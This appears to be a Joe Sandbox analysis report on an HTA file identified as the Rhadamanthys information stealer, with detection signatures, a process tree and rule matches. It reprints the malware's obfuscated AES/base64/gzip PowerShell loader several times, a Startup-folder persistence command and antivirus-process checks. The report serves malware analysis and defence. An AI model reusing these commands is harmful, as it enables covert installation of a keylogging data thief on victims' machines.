Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.hta

Overview

General Information

Sample name:setup.hta
Analysis ID:1395895
MD5:bde81fba29e56db0dd8fe36fffa8c3c0
SHA1:3da0fb3b154eefc03ad4448b5d5809d8c3d22061
SHA256:79ae52b1bbf60846666893fa94f3a07252156d6ee385fc3bd8aab3370eea1ca7
Tags:hta
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected RHADAMANTHYS Stealer
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 5444 cmdline: mshta.exe "C:\Users\user\Desktop\setup.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • chrome.exe (PID: 5248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • ClassroomEc.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\ClassroomEc.exe" MD5: 956D074F7C6BD174C43586F07892E820)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 8008 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7956 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 7616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7704 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 6768 cmdline: cmd /c md 30253 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 7280 cmdline: cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 8156 cmdline: cmd /c copy /b Conf 30253\m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Identification.pif (PID: 8140 cmdline: 30253\Identification.pif 30253\m MD5: 848164D084384C49937F99D5B894253E)
              • cmd.exe (PID: 1960 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • PING.EXE (PID: 4676 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
SourceRuleDescriptionAuthorStrings
00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Process Memory Space: powershell.exe PID: 4820INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xc763d:$b1: ::WriteAllBytes(
        • 0xc7a6e:$b1: ::WriteAllBytes(
        • 0x1a3ffb:$b1: ::WriteAllBytes(
        • 0x1cef28:$b1: ::WriteAllBytes(
        • 0x1e8264:$b1: ::WriteAllBytes(
        • 0x1e8710:$b1: ::WriteAllBytes(
        • 0xa31:$b2: ::FromBase64String(
        • 0xa69:$b2: ::FromBase64String(
        • 0xa3a0:$b2: ::FromBase64String(
        • 0xa3d6:$b2: ::FromBase64String(
        • 0x16fb4:$b2: ::FromBase64String(
        • 0x16fea:$b2: ::FromBase64String(
        • 0x3bfa9:$b2: ::FromBase64String(
        • 0x3bfdd:$b2: ::FromBase64String(
        • 0x3c71e:$b2: ::FromBase64String(
        • 0x3c752:$b2: ::FromBase64String(
        • 0x3cb2f:$b2: ::FromBase64String(
        • 0x3dd51:$b2: ::FromBase64String(
        • 0x46143:$b2: ::FromBase64String(
        • 0x46177:$b2: ::FromBase64String(
        • 0x48828:$b2: ::FromBase64String(
        Process Memory Space: powershell.exe PID: 4408INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x89364:$b1: ::WriteAllBytes(
        • 0x384a3:$s1: -join
        • 0x38e99:$s1: -join
        • 0xa4028:$s1: -join
        • 0x1acd6f:$s1: -join
        • 0x1b9e44:$s1: -join
        • 0x1bd216:$s1: -join
        • 0x1bd8c8:$s1: -join
        • 0x1bf3b9:$s1: -join
        • 0x1c15bf:$s1: -join
        • 0x1c1de6:$s1: -join
        • 0x1c2656:$s1: -join
        • 0x1c2d91:$s1: -join
        • 0x1c2dc3:$s1: -join
        • 0x1c2e0b:$s1: -join
        • 0x1c2e2a:$s1: -join
        • 0x1c367a:$s1: -join
        • 0x1c37f6:$s1: -join
        • 0x1c386e:$s1: -join
        • 0x1c3901:$s1: -join
        • 0x1c3b67:$s1: -join
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        19.3.Identification.pif.8b10000.9.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          19.3.Identification.pif.8b10000.9.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            19.3.Identification.pif.88f0000.8.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi32_4408.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x80:$b1: ::WriteAllBytes(
              • 0xc69e:$s1: -join
              • 0x5e4a:$s4: +=
              • 0x5f0c:$s4: +=
              • 0xa133:$s4: +=
              • 0xc250:$s4: +=
              • 0xc53a:$s4: +=
              • 0xc680:$s4: +=
              • 0x38638:$s4: +=
              • 0x386b8:$s4: +=
              • 0x3877e:$s4: +=
              • 0x387fe:$s4: +=
              • 0x389d4:$s4: +=
              • 0x38a58:$s4: +=
              • 0x23bc:$e4: Get-WmiObject
              • 0x25ab:$e4: Get-Process
              • 0x2603:$e4: Start-Process

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
